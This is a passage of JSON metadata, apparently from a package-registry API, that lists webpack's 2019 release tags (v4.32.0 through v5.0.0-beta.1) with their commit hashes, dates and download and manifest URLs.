/github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0"